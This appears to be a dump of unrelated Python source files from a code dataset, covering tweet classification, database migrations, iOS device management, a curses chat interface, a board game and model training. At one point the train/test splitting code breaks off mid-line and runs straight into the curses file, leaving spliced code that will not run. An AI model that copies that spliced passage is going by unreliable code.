page:\n list_tweetY.append(item.text)\n\n return list_tweetX, list_tweetY\n\n\ndef sim_word_net(j, z1):\n for i in z1:\n if (j == i): return True # the term exists in this document (or is a synonym)\n return False\n\n\n# computes the tf-idf weighting of a document that is not labeled\ndef tf_idf(list1,clusters):\n temp=[]\n temp_repl=[]\n\n # doc weighted\n for i in list1:\n if not i in temp_repl: # skip words already seen\n temp_repl.append(i)\n\n # tf\n n_i=1 # the document itself counts once\n fr_i=list1.count(i)\n\n\n # idf\n for z in range(0,len(clusters)):\n if (sim_word_net(i,clusters[z])):\n n_i=n_i + 1\n\n w= ((1 + math.log10(fr_i))) * (math.log10((1 + 2 / n_i))) # tf-idf\n temp.append(w)\n\n\n return temp\n\n# weighted schema for the document set, and alignment of the whole set with the unlabeled doc\ndef tf_idf_cluster(cluster_cluster,clusters_weighted,not_replicated):\n\n temp = []\n temp_repl = []\n\n # doc weighted\n for i in range(0,len(cluster_cluster)):\n for j in range(0, len(cluster_cluster[i])):\n if not cluster_cluster[i][j] in temp_repl: # skip words already seen\n temp_repl.append(cluster_cluster[i][j])\n\n # tf\n n_i = 1 # the document itself counts once\n fr_i = cluster_cluster[i].count(cluster_cluster[i][j])\n\n\n # idf: count how many documents contain this word\n for z in range(0, len(cluster_cluster)):\n if (sim_word_net(cluster_cluster[i][j], cluster_cluster[z])):\n n_i = n_i + 1\n\n w = ((1 + math.log10(fr_i))) * (math.log10((1 + 2 / n_i))) # tf-idf\n temp.append(w)\n\n clusters_weighted.append([w for w in temp])\n temp.clear()\n not_replicated.append([w for w in temp_repl])\n temp_repl.clear()\n\n\ndef alignment_doc_clusters(list_target,clusters_weighted,not_replicated,gold):\n silver = []\n for itemI in range(0,len(not_replicated)):\n for itemJ in range(0,len(not_replicated[itemI])):\n if not_replicated[itemI][itemJ] in list_target:\n silver.append(clusters_weighted[itemI][not_replicated[itemI].index(not_replicated[itemI][itemJ])])\n else:\n silver.append(0)\n gold.append([w for w in silver])\n silver.clear()\n\n\n# text cleaning\ndef clean_text(original_list):\n list_splitted=[]\n list_clean=[]\n for i in original_list:\n list_splitted.append(i.split())\n\n # stop-word file: every word listed there is dropped\n grammarlist=[]\n try:\n with open('data_set/grammarList', 'r') as f:\n grammarlist.append(f.read().splitlines())\n\n\n except IOError:\n print('file not found!')\n exit()\n\n\n for i in range(0, len(list_splitted)):\n\n\n for j in range(0, len(list_splitted[i])):\n\n if not re.search('https?|RT|[^A-Za-z]|amp|[ah|ha]+', list_splitted[i][j]):\n list_splitted[i][j]=re.sub('•|‘|\"|”|!|“|,|:|&|;|/|\\+|\\?|…|[.]+|-|–|—|→|\\(|\\)', '', list_splitted[i][j].lower()) # strip punctuation and tweet artifacts (links, RT, @tags)\n if not (len(list_splitted[i][j]) < 4):\n if not (any(list_splitted[i][j].lower() in s for s in grammarlist)):\n list_clean.append(list_splitted[i][j].lower())\n\n return list_clean\n\n\n#This function gets data from files. The files are labeled by humans and represent the reference model\n#new files not labeled will be labeled following the reference model. 
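Each file under data_set/category supplies the words for one labeled reference document. 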
In this way, the algorithm of classification will become\n#an algorithm supervisioned.\ndef get_cluster(name_cluster):\n try:\n l = []\n with open('data_set/category/'+name_cluster, 'r') as f:\n for item in f:\n l.extend(item.split())\n return l\n f.close()\n except IOError:\n print('File not found!')\n exit('Exit')\n\n\ndef get_twitter_data():\n try:\n l = []\n with open('data_set/top_users', 'r') as f:\n for item in f:\n l.extend(item.splitlines())\n f.close()\n return l\n except IOError:\n print('File not found!')\n exit('Exit')\n\n\n\ndef main_area():\n cluster_label = [('music'), ('physics'), ('orientalism'), ('philosophy'), ('astronomy'), ('art'), ('history'),\n ('politics')]\n cluster_cluster = []\n clusters_weighted = []\n not_replicated = []\n print('Loading')\n tree_hyponyms=taxonomy(cluster_label)\n print('- Taxonomy clusters created')\n\n for i in cluster_label:\n cluster_list = get_cluster(i)\n cluster_clean = clean_text(cluster_list)\n cluster_cluster.append(cluster_clean)\n print('- Clusters cleaned')\n\n tf_idf_cluster(cluster_cluster, clusters_weighted, not_replicated) # only one!\n print('- TF-IDF for clusters done')\n\n l = get_twitter_data()#get list users.. only name\n print('- Target data loaded\\n')\n\n i = 0\n while (i < len(l) - 1):\n list_tweetX, list_tweetY = get_data(l[i], l[i + 1])\n listX_clean = clean_text(list_tweetX)\n listY_clean = clean_text(list_tweetY)\n fdist1 = FreqDist(listX_clean)\n fdist2 = FreqDist(listY_clean)\n most_common1 = fdist1.most_common() # I delete the useless special symbols such as smile, etc...\n most_common2 = fdist2.most_common()\n most_common1.reverse()\n most_common2.reverse()\n main_classifierV2(l[i], l[i + 1], listX_clean, listY_clean,cluster_cluster, clusters_weighted, not_replicated,cluster_label)\n main_classifierV1(l[i], l[i + 1], most_common1[:40], most_common2[:40],tree_hyponyms)\n i += 2\n\n\ndef main_classifierV2(userX,userY,listX_clean,listY_clean,cluster_cluster,clusters_weighted,not_replicated,cluster_label):\n listSimX = []\n listSimY = []\n gold = []\n\n #doc weighted\n doc_weight1=tf_idf(listX_clean,cluster_cluster)\n doc_weight2=tf_idf(listY_clean,cluster_cluster)\n\n alignment_doc_clusters(listX_clean,clusters_weighted,not_replicated,gold)\n\n\n for i in range(0,len(gold)):\n listSimX.append(sim_vectorial(doc_weight1,gold[i],clusters_weighted[i]))\n\n gold.clear()\n alignment_doc_clusters(listY_clean, clusters_weighted, not_replicated, gold)\n\n for i in range(0, len(gold)):\n listSimY.append(sim_vectorial(doc_weight2, gold[i], clusters_weighted[i]))\n\n print('ClassifierV2')\n print(userX,' ',(listSimX),' ',cluster_label[listSimX.index(max(listSimX))])\n print(userY, ' ', (listSimY), ' ', cluster_label[listSimY.index(max(listSimY))],'\\n')\n\n\n\n\nmain_area()\n\n\n\n\n\n\n\n\n\n\n","sub_path":"classifierV2.py","file_name":"classifierV2.py","file_ext":"py","file_size_in_byte":11240,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"52110756","text":"import json\nimport os\n\nfrom algorithm.tools.experiment import ExperimentFactory\nfrom algorithm.tools.iteration import IterationFactory\nfrom algorithm.policies import SuppDataset, PolicyFactory\nfrom algorithm.tools.statistics import Statistics\nfrom algorithm.tools.utils import Config, mkdir_p\n\n\ndef setup_worker(exp):\n\n config = Config(**exp['config'])\n experiment = ExperimentFactory.create(SuppDataset(exp['dataset']), exp, config, master=False)\n policy = 
PolicyFactory.create(dataset=SuppDataset(exp['dataset']), exp=exp)\n\n return config, policy, experiment\n\n\ndef setup_master(exp):\n\n _log_dir = 'logs/{}_{}_{}_{}'.format(exp['algorithm'], exp['dataset'],\n exp['policy_options']['net'], os.getpid())\n mkdir_p(_log_dir)\n exp.update({'log_dir': _log_dir})\n\n config = Config(**exp['config'])\n iteration = IterationFactory.create(config, exp)\n experiment = ExperimentFactory.create(SuppDataset(exp['dataset']), exp, config)\n policy = PolicyFactory.create(dataset=SuppDataset(exp['dataset']), exp=exp)\n statistics = Statistics()\n\n if 'from_infos' in exp and exp['from_infos'] is not None:\n with open(exp['from_infos']) as f:\n infos = json.load(f)\n\n statistics.init_from_infos(infos)\n iteration.init_from_infos(infos)\n experiment.init_from_infos(infos)\n\n elif 'from_single' in exp and exp['from_single'] is not None:\n iteration.init_from_single(exp['from_single'], exp, policy)\n else:\n iteration.init_from_zero(exp, policy)\n\n return config, policy, statistics, iteration, experiment\n","sub_path":"src/algorithm/tools/setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":1621,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"126037524","text":"\"\"\"Init database\n\nRevision ID: a16569c96cbf\nRevises: \nCreate Date: 2020-01-04 23:30:51.977791\n\n\"\"\"\nfrom alembic import op\nimport sqlalchemy as sa\n\n\n# revision identifiers, used by Alembic.\nrevision = 'a16569c96cbf'\ndown_revision = None\nbranch_labels = None\ndepends_on = None\n\n\ndef upgrade():\n # ### commands auto generated by Alembic - please adjust! ###\n op.create_table('users',\n sa.Column('id', sa.Integer(), autoincrement=True, nullable=False),\n sa.Column('telegram_id', sa.Integer(), nullable=True),\n sa.Column('is_admin', sa.Boolean(), nullable=False),\n sa.Column('created_date', sa.DateTime(timezone=True), server_default=sa.text('now()'), nullable=True),\n sa.PrimaryKeyConstraint('id')\n )\n op.create_index(op.f('ix_users_id'), 'users', ['id'], unique=False)\n op.create_index(op.f('ix_users_telegram_id'), 'users', ['telegram_id'], unique=True)\n op.create_table('categories',\n sa.Column('id', sa.Integer(), autoincrement=True, nullable=False),\n sa.Column('name', sa.String(length=64), nullable=False),\n sa.Column('user_id', sa.Integer(), nullable=False),\n sa.Column('created_date', sa.DateTime(timezone=True), server_default=sa.text('now()'), nullable=True),\n sa.ForeignKeyConstraint(['user_id'], ['users.id'], ondelete='CASCADE'),\n sa.PrimaryKeyConstraint('id')\n )\n op.create_index(op.f('ix_categories_id'), 'categories', ['id'], unique=False)\n # ### end Alembic commands ###\n\n\ndef downgrade():\n # ### commands auto generated by Alembic - please adjust! 
###\n op.drop_index(op.f('ix_categories_id'), table_name='categories')\n op.drop_table('categories')\n op.drop_index(op.f('ix_users_telegram_id'), table_name='users')\n op.drop_index(op.f('ix_users_id'), table_name='users')\n op.drop_table('users')\n # ### end Alembic commands ###\n","sub_path":"server/db/migrations/versions/2020_01_04_a16569c96cbf_init_database.py","file_name":"2020_01_04_a16569c96cbf_init_database.py","file_ext":"py","file_size_in_byte":1819,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"467090986","text":"from django.contrib.contenttypes import generic\nfrom django.contrib.auth.models import User, Group\nfrom django.db import models\nfrom mezzanine.pages.models import Page, RichText\nfrom mezzanine.core.models import Ownable\nfrom hs_core.models import AbstractResource\n\n#\n# To create a new resource, use these three super-classes. \n#\n\nclass HydromodelResource(Page, RichText, AbstractResource):\n\n # This will save the file in ./static/media/hs/hydromodel\n hm_zip = models.FileField(verbose_name='Model Archive',name='modelzip',upload_to='./hs/hydromodel',\n help_text='Upload Model Archive as *.ZIP')\n\n\n hm_description = models.TextField(verbose_name='Description', null=False,blank=True,default='',\n help_text='Add a short description of the model simulation')\n\n hm_version = models.CharField(verbose_name='Version',null=False,blank=True,default='1.0',\n help_text='Specify the simulation version to distinguish between similar model simulations')\n\n hm_type = models.CharField(verbose_name='Type', default='Instance',\n help_text='Specify the type of HydroModel (e.g. Model Instance, Model Program, etc...')\n # if instance, choose parent model or create parent model\n\n\n #######################\n # TEMPORAL DEFINITION #\n #######################\n # Only for Instance Types\n hm_begin = models.DateTimeField(verbose_name='Simulation Begin',\n help_text='The start date of the model simulation (mm/dd/yyyy hh:mm)')\n hm_end = models.DateTimeField(verbose_name='Simulation End',\n help_text='The end date of the model simulation (mm/dd/yyyy hh:mm)')\n hm_timestep = models.FloatField(verbose_name='Simulation Time Interval',\n help_text='The timestep interval that is used for calculations (in seconds)')\n\n\n\n\n class Meta:\n verbose_name = 'HydroModel'\n\n\n","sub_path":"models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":2028,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"517701575","text":"#!/usr/bin/env python3\n# coding: utf-8\n#\n# author: codeskyblue\n\nimport os\nimport threading\nimport time\nimport subprocess\nimport wda\nimport queue\nimport atexit\nimport signal\nimport subprocess\n\n# import wdadb\n\nimport logzero\nfrom logzero import logger\nimport logging\nimport rethinkdb as r\nfrom rethinkdb.errors import RqlRuntimeError, RqlDriverError\n\n_DEVNULL = open(os.devnull, 'wb')\nlogzero.loglevel(logging.INFO)\n\n\nRDB_HOST = os.environ.get('RDB_HOST') or 'localhost'\nRDB_PORT = os.environ.get('RDB_PORT') or 28015\nRDB_DBNAME = os.environ.get(\"RDB_DBNAME\") or \"iOSTest\"\n\n\nclass Database(object):\n def __init__(self):\n conn = r.connect(RDB_HOST, RDB_PORT)\n try:\n r.db_create(RDB_DBNAME).run(conn)\n r.db(RDB_DBNAME).table_create(\"devices\").run(conn)\n print(\"App database created\")\n except (RqlRuntimeError, RqlDriverError):\n print(\"App already exists\")\n\n def _run(self, rsql):\n try:\n c = r.connect(RDB_HOST, 
RDB_PORT, db=RDB_DBNAME)\n return rsql.run(c)\n except RqlDriverError:\n logger.warning(\"No database connection could be established!\")\n\n def device_save(self, id: str, v: dict):\n ret = self._run(r.table(\"devices\").get(id).update(v))\n if ret['skipped']:\n v['id'] = id\n self._run(r.table(\"devices\").insert(v))\n\n def device_reset(self):\n self._run(r.table(\"devices\").update({\"status\": \"offline\"}))\n\n\n_STATUS_PREPARING = \"preparing\"\n_STATUS_OFFLINE = \"offline\"\n_STATUS_IDLE = \"idle\"\n\n\nclass IDevice(object):\n \"\"\" IOS Device \"\"\"\n\n def __init__(self, udid: str, port: int, hookfunc):\n self._udid = udid\n self._port = port\n self._que = queue.Queue()\n self._hookfunc = hookfunc\n self._name = None\n\n self._iproxy_proc = subprocess.Popen(\n [\"iproxy\", str(port), \"8100\", udid], stdout=_DEVNULL, stderr=_DEVNULL)\n self._wdaproc = None\n self._ok = threading.Event()\n self._ok.set()\n self._output_fd = open(\"logs/%s-wdalog.txt\" % udid, \"wb\")\n self._client = wda.Client(\"http://localhost:%d\" % port)\n self._last_status = None\n self._info = {\n \"udid\": udid,\n \"port\": port,\n \"status\": _STATUS_PREPARING,\n }\n self.init_thread()\n\n @property\n def udid(self):\n return self._udid\n\n @property\n def name(self):\n if self._name:\n return self._name\n self._name = udid2name(self._udid)\n return self._name\n\n def hook(self, status: str):\n \"\"\"\n Hook when status change\n\n Args:\n status: occupied\n \"\"\"\n if not self._hookfunc:\n return\n if self._last_status == status:\n return\n self._last_status = status\n self._info['status'] = status\n self._hookfunc(self, status)\n\n def set_offline(self):\n self._ok.clear()\n\n def init_thread(self):\n logger.info(\"%s start watch thread\", self._udid)\n self._wth = threading.Thread(\n target=self._watch, name=self._udid + \":watch\")\n self._wth.daemon = True\n self._wth.start()\n\n def start_wda(self):\n if self._wdaproc:\n logger.warning(\"wda proc thread is already started\")\n return\n self._wda_started = time.time()\n self._wdaproc = subprocess.Popen(\n ['sh', 'runwda.sh', self._udid], stdout=_DEVNULL, stderr=self._output_fd)\n\n def stop_wda(self):\n logger.info(\"%s WDA stopped\", self._udid)\n if self._wdaproc is None:\n logger.warning(\"%s wda is already killed\", self._udid)\n return\n self._wdaproc.terminate()\n self._wdaproc = None\n\n def is_wda_ok(self):\n try:\n resp = self._client.status()\n self._info['ip'] = resp['ios']['ip']\n return True\n except:\n return False\n\n def _watch(self):\n while True:\n if self._ok.is_set():\n if not self._wdaproc:\n logger.info(\"%s start WDA\", self._udid)\n self.start_wda()\n # should check here\n if self.is_wda_ok():\n self.hook(_STATUS_IDLE)\n logger.debug(\"%s WDA is ready to use\", self._udid)\n else:\n self.hook(_STATUS_PREPARING)\n logger.debug(\"%s WDA is still waiting\", self._udid)\n\n if time.time() - self._wda_started > 30:\n logger.warning(\n \"%s WDA is down, restart after 3s\", self._udid)\n self.stop_wda() # restart\n time.sleep(3)\n else:\n self.hook(_STATUS_OFFLINE)\n self.stop_wda()\n self._ok.wait()\n\n\ndef is_port_in_use(port):\n import socket\n with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:\n return s.connect_ex(('localhost', port)) == 0\n\n\n__port = 8100\n\n\ndef free_port():\n global __port\n for i in range(20):\n if not is_port_in_use(__port + i):\n __port += i\n return __port\n raise RuntimeError(\"No free port can be found, should not happens\")\n\n\ndevice_ports = {}\n\n\ndef get_device_port(udid: str):\n 
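# keep the udid-to-port mapping sticky so a device that drops off and reconnects gets the same iproxy port again\n 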
if udid in device_ports:\n return device_ports[udid]\n port = free_port()\n device_ports[udid] = port\n return port\n\n\ndef runcommand(*args, check=False):\n p = subprocess.run(args, capture_output=True, check=check)\n return p.stdout.strip().decode('UTF-8')\n\n\ndef udid2name(udid):\n try:\n return runcommand('idevicename', '-u', udid, check=True)\n except subprocess.CalledProcessError:\n return None\n\n\ndef list_udids():\n \"\"\"\n Returns:\n list of udid\n \"\"\"\n udids = runcommand('idevice_id', '-l').splitlines()\n return udids\n\n\ndef main():\n idevices = {}\n\n # stop all process\n os.setpgrp()\n\n def cleanup():\n os.killpg(0, signal.SIGKILL)\n\n atexit.register(cleanup)\n\n # init all\n os.makedirs(\"logs\", exist_ok=True)\n db = Database()\n db.device_reset()\n\n def hookfunc(idevice, status):\n \"\"\" id, name, port, status \"\"\"\n udid = idevice.udid\n info = idevice._info.copy()\n info['id'] = info.pop('udid')\n info['name'] = idevice.name or 'unknown'\n db.device_save(udid, info)\n logger.info(\">>> %s [%s]\", udid, status)\n\n last_udids = []\n while True:\n curr_udids = list_udids()\n offlines = set(last_udids).difference(curr_udids)\n onlines = set(curr_udids).difference(last_udids)\n last_udids = curr_udids\n\n for udid in onlines:\n port = get_device_port(udid)\n logger.info(\"UDID: %s came online, port: %d\", udid, port)\n if udid not in idevices:\n idevices[udid] = IDevice(\n udid, port, hookfunc)\n idevices[udid]._ok.set()\n\n for udid in offlines:\n logger.warning(\"UDID: %s went offline\" % udid)\n # start iproxy and wda watch(start wda, pull status() and check if cmd finished)\n idevices[udid].set_offline()\n time.sleep(.5)\n\n\nif __name__ == \"__main__\":\n main()\n","sub_path":"wdakeeper.py","file_name":"wdakeeper.py","file_ext":"py","file_size_in_byte":7326,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"300409856","text":"# from sklearn.model_selection import train_test_split\n# import pandas as pd\nimport numpy as np\n\ndef data_to_test_train(input_file = \"outputs/label_out.csv\",\n train_out = \"outputs/train_out.csv\",\n test_out = \"outputs/test_out.csv\",\n test_ratio = 0.2,\n verbose=False):\n # input_file = \"data/label_out.csv\"\n # df = pd.read_csv(data_file, sep=\",\")\n data = np.genfromtxt(input_file, delimiter=',',skip_header=True)\n n = data.shape[0]\n if verbose: print(data.shape)\n # n=10\n if verbose:print(n)\n # test_ratio = 0.2\n test_size = int(n * test_ratio)\n audio_unique, count_unique = np.unique(data[:,0],return_counts=True)\n # audio_train = audio_unique[:int(audio_unique.shape[0]/2)]\n # audio_test = audio_unique[int(audio_unique.shape[0]/2):]\n test_len = 0\n test = []\n test_n = []\n tmp_audio_uniq = np.arange(audio_unique.shape[0])\n while(test_len self.top():\n self.current_line -= 1\n\n def scroll_down(self):\n if self.current_line < self.bottom():\n self.current_line += 1\n\n def top(self):\n return 0\n\n def bottom(self):\n return self.height - self.screen_height()\n\n def cursor_to_bottom(self):\n for i in range(0,self.height):\n try:\n self.pad.addch(ord('\\n'))\n except curses.error:\n pass\n\n def infinite_scroll(self):\n self.pad.scrollok(True)\n self.cursor_to_bottom()\n self.current_line = self.bottom()\n\n # shorthand \n def addstr(self, a1, a2=None, a3=None, a4=None):\n if a2==None:\n try:\n self.pad.addstr(a1)\n except curses.error:\n pass\n elif a3==None:\n try:\n self.pad.addstr(a1,a2)\n except curses.error:\n pass\n elif a4==None:\n try:\n 
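# three-argument overload, typically pad.addstr(y, x, str)\n 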
self.pad.addstr(a1,a2,a3)\n except curses.error:\n pass\n else:\n try:\n self.pad.addstr(a1,a2,a3,a4)\n except curses.error:\n pass\n\n\n#-----------Functions-------------\n\n# gracefully close curses\ndef close_curses():\n curses.echo()\n curses.nocbreak()\n stdscr.keypad(0)\n curses.endwin()\n\n# set the colors\ndef set_colors():\n curses.start_color()\n curses.use_default_colors()\n curses.init_pair(1, 3, -1)\n curses.init_pair(2, 6, -1)\n\ndef max_x():\n y,x = stdscr.getmaxyx()\n return x\n\ndef max_y():\n y,x = stdscr.getmaxyx()\n return y\n\n# pad which holds contacts in order of most recent communication\n# uses \n# TODO get recent convo data slapped into here\ndef create_recents():\n # init\n recents = ScrollyPad(100, max_x(), 0,0, 3,max_x())\n \n # set text\n recents.addstr(0, 0, \"3* Test Man\")\n recents.addstr(1, 0, \"2* First Last\")\n recents.addstr(2, 0, \"2* John Doe\")\n recents.addstr(3, 0, \" * Joe Doe\")\n recents.addstr(4, 0, \" * Mr. Not Visible Without Scroll\")\n recents.addstr(5, 0, \" * Sir\")\n recents.addstr(6, 0, \" * Buzz Lightyear\")\n\n return recents\n\n# generates a conversation header holdering the conversation name\n#TODO auto width of \"=\"; maybe a max width and a min number of ='s on the left side (like 2 or 4?)\ndef get_convo_header(name):\n return \"==================\" + name + \"==================\"\n\n# pad which holds the current conversation\n# uses a newline at the end of each message so that each message is fully displayed\n# TODO get convo data slapped into here\ndef create_convo():\n # init\n convo = ScrollyPad(1000,max_x(), recents.screen_height()+1,0, max_y()-message.screen_height(),max_x()) #TODO +1 is for the decorations. Maybe integrate the decorations into convo \n convo.infinite_scroll()\n\n # set text\n convo.addstr(\"T: sup foo\\n\", curses.color_pair(2))\n convo.addstr(\"N: nm bruh, jst chiln\\n\")\n convo.addstr(\"T: Bruh bruh asdlfkjasdfl;kjasdfjklahsdflkjahsdflkjhasdflkjhasdflkjhasdflkjhasdflkjhasdflkjhasdflkjhasdflkjahsdflkjahsdflkjahsdflkjahsdflkajhsdf end of long thing (hey it wrapped!!)\\n\", curses.color_pair(2))\n convo.addstr(\"N: This should block your wrapped message, T!! :P\\n\")\n convo.addstr(\"T: Ha! It didn't block my wrapped message because you learned that addstr keeps track of your cursor position!!\\n\", curses.color_pair(2))\n convo.addstr(\"N: I wish I never figured that out :'(\\n\")\n convo.addstr(\"T: Too late! 
My keyboard spam is already in our convo!\\n\", curses.color_pair(2))\n\n    return convo\n\n# create a pad to hold a typed message\n# TODO pad should grow as message is typed (*cough* noutrefresh doupdate *cough*)\ndef create_message():\n    # init\n    message = ScrollyPad(100, max_x(), max_y()-1,0, max_y()-1,max_x()) \n    message.infinite_scroll()\n\n    # set text\n    message.addstr(\"N: \", curses.A_BOLD)\n\n    return message\n\n# ----------------MAIN-------------------\n\n# constants\nmsg_height = 0\n\n# init curses\nstdscr = curses.initscr()\n#curses.noecho()\ncurses.cbreak()\nstdscr.keypad(1)\n#atexit.register(close_curses)\nset_colors()\n\n# create pads\nrecents = create_recents()\nmessage = create_message()\nconvo = create_convo()\nstdscr.addstr(recents.screen_height(), 0,get_convo_header(\"Time\"), curses.color_pair(2)) \n\n# set up curses interface (ie tests on stdscr)\n# stdscr.addstr(7, 0, \"A hectic hello to Curses!!!\", curses.A_STANDOUT)\n\n# refresh screens\nstdscr.noutrefresh()\nrecents.refresh()\nconvo.refresh()\nmessage.refresh()\ncurses.doupdate()\n\nstdscr.getch()\n\nclose_curses()\n","sub_path":"shexter_client/shexter_tui.py","file_name":"shexter_tui.py","file_ext":"py","file_size_in_byte":5306,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"546396089","text":"from common import Watch\n\nWatch.start()\nlim = 100\nways = [1] + [0] * lim\nfor n in range(1, lim + 1):\n    for i in range(n, lim + 1):\n        ways[i] += ways[i - n]\nprint(ways[lim] - 1)\nWatch.stop()\n    ","sub_path":"50_99/src/task76/s76.py","file_name":"s76.py","file_ext":"py","file_size_in_byte":200,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"566276994","text":"# Copyright (C) 2020 Google Inc.\n# Licensed under http://www.apache.org/licenses/LICENSE-2.0 \n\n\"\"\"\nResolve duplicates in access_control_people\n\nCreate Date: 2019-04-04 09:11:21.904685\n\"\"\"\n# disable Invalid constant name pylint warning for mandatory Alembic variables.\n# pylint: disable=invalid-name\n\nimport logging\nimport sqlalchemy as sa\n\nfrom alembic import op\n\n\n# revision identifiers, used by Alembic.\nrevision = '014ddab36256'\ndown_revision = 'adf7bdb8996e'\n\n\nlogger = logging.getLogger(__name__)\n\n\ndef remove_duplicates(connection):\n  \"\"\"Remove duplicates from table if any\"\"\"\n\n  # Get list of duplicated IDs to be removed:\n  # inner SELECT returns MIN IDs (i.e. original ones,\n  # for which duplicates exist)\n  # outer SELECT returns ID which are duplicates (i.e. 
exclude original ones)\n  dup_items = list(connection.execute(\n      sa.text(\n          \"\"\"\n          SELECT\n              acp.id, acp.person_id, acp.ac_list_id\n          FROM\n              access_control_people acp\n          JOIN\n              (SELECT\n                  MIN(acp1.id) AS id,\n                  acp1.person_id AS person_id,\n                  acp1.ac_list_id AS ac_list_id\n              FROM\n                  access_control_people acp1\n              GROUP BY acp1.person_id , acp1.ac_list_id\n              HAVING COUNT(*) > 1) acp2 ON acp.person_id = acp2.person_id\n                  AND acp.ac_list_id = acp2.ac_list_id\n          WHERE\n              acp.id != acp2.id\n          \"\"\"))\n  )\n\n  if dup_items:\n    logging.warning(\n        '[rev:%s] Duplicated items:\\n%s', revision,\n        '\\n'.join('id={} person_id={} ac_list_id={}'.format(\n            i.id, i.person_id, i.ac_list_id\n        ) for i in dup_items)\n    )\n  else:\n    logging.warning(\"[rev:%s] No duplicated items found\", revision)\n    return\n\n  dup_ids = list(i.id for i in dup_items)\n\n  # Remove duplicates\n  connection.execute(\n      sa.text(\"DELETE FROM access_control_people WHERE id IN :orig_ids\"),\n      orig_ids=dup_ids\n  )\n\n\ndef add_constraint(connection):\n  \"\"\"Add constraint to make person_id/ac_list_id pair unique in DB\"\"\"\n  connection.execute(\"\"\"\n      ALTER TABLE access_control_people\n      ADD CONSTRAINT uq_access_control_people\n      UNIQUE (person_id, ac_list_id);\n  \"\"\")\n\n\ndef upgrade():\n  \"\"\"Upgrade database schema and/or data, creating a new revision.\"\"\"\n\n  connection = op.get_bind()\n\n  remove_duplicates(connection)\n  add_constraint(connection)\n\n\ndef downgrade():\n  \"\"\"Downgrade database schema and/or data back to the previous revision.\"\"\"\n  raise NotImplementedError(\"Downgrade is not supported\")\n","sub_path":"src/ggrc/migrations/versions/20190404_014ddab36256_resolve_duplicates_in_access_control_.py","file_name":"20190404_014ddab36256_resolve_duplicates_in_access_control_.py","file_ext":"py","file_size_in_byte":2602,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"461144576","text":"import time\r\nfrom .mylog import logger as lg\r\n\r\n\r\ndef timeur(func):\r\n    def wrapper(*args, **kwargs):\r\n        debut = time.clock()\r\n        resultat = func(*args, **kwargs)\r\n        fin = time.clock()\r\n        temps = round(fin - debut, 2)\r\n        lg.info(f\"Function {func.__name__} executed in {temps} seconds\")\r\n        return resultat\r\n    return wrapper\r\n","sub_path":"utils/decorateurs.py","file_name":"decorateurs.py","file_ext":"py","file_size_in_byte":329,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"59902505","text":"from random import randint\nfrom actions import Turn\n\n\nclass Game(object):\n    def __init__(self, players, board):\n        self.players = players\n        self.board = board\n        self.dice = None\n        self.previous_player = None\n        self.current_player = None\n        self.robber = None\n        self.turn = None\n\n    def seat_players(self):\n        n = len(self.players)\n        # Link each player to the following one, wrapping the last player back to the first.\n        for i, p in enumerate(self.players):\n            p.next_player = self.players[(i + 1) % n]\n\n    def player_turn(self, player):\n        \"\"\"\n        Advances to the next player\n        :param player: \n        :return: \n        \"\"\"\n        self.previous_player = self.current_player\n        self.current_player = player\n        self.dice = None\n        print(\"Current turn: Player #\", self.current_player.player_id)\n        self.turn = Turn(self.board, player)\n\n    def pregame(self, turns_list):\n        while turns_list:\n            self.player_turn(self.players[turns_list[0]])\n            self.wait_for_player_input_sett()\n            self.wait_for_player_input_road()\n            del turns_list[0]\n        self.seat_players()\n        print(\"Game starts now\")\n        print(\"Current turn: Player \", self.current_player.player_id)\n
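        # Placement rounds are done; roll the dice to begin the first regular turn.\n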
        self.roll_dice()\n\n    def wait_for_player_input_road(self):\n        valid = False\n        options = set([])\n        for s in self.current_player.settlements_built:\n            for r in s.neighbour_roads:\n                if r.available:\n                    options.add(r.road_id)\n        while not valid:\n            road_id = int(input(\"Player #{}, where would you like to build a road: \"\n                                .format(self.current_player.player_id)))\n            if road_id not in list(range(0, 72)):\n                print(\"Not a valid road id\")\n                continue\n            if road_id not in options:\n                print(\"Not an optional road id\")\n                continue\n            if self.road_spot_available(road_id):\n                valid = True\n            else:\n                print(\"Not an optional road id\")\n        self.build_road(road_id)\n\n    def wait_for_player_input_sett(self):\n        valid = False\n        while not valid:\n            sett_id = int(input(\"Player #{}, where would you like to build a settlement: \"\n                                .format(self.current_player.player_id)))\n            if sett_id not in list(range(0, 54)):\n                print(\"Not a valid settlement id\")\n                continue\n            if self.sett_spot_available(sett_id):\n                valid = True\n            else:\n                print(\"Not an optional spot\")\n        self.build_first_settelment(sett_id)\n\n    @staticmethod\n    def first_player(number_of_players):\n        first = randint(0, number_of_players - 1)\n        players = list(range(first, number_of_players))\n        if first not in (0, number_of_players - 1):\n            for i in list(range(0, first)):\n                players.append(i)\n            for i in reversed(players):\n                players.append(i)\n        elif first == 0:\n            for i in reversed(players):\n                players.append(i)\n        else:\n            for i in list(range(0, number_of_players)):\n                players.append(i)\n            for i in reversed(players):\n                players.append(i)\n        return players\n\n\n","sub_path":"game.py","file_name":"game.py","file_ext":"py","file_size_in_byte":3394,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"170689816","text":"\"\"\"Train the triad model\"\"\"\nimport argparse\nimport os\nimport pickle\n\nfrom src.build_data import build_dataFrame, DataGen\n\n\ndef main():\n\n    parser = argparse.ArgumentParser()\n\n    parser.add_argument(\"train_dir\",\n                        help=\"Directory containing training annotations\")\n\n    parser.add_argument(\"model_destination\",\n                        help=\"Where to store the trained model\")\n\n    parser.add_argument(\"--val_dir\",\n                        default=None,\n                        help=\"Directory containing validation annotations\")\n\n    parser.add_argument(\"--neg_ratio\",\n                        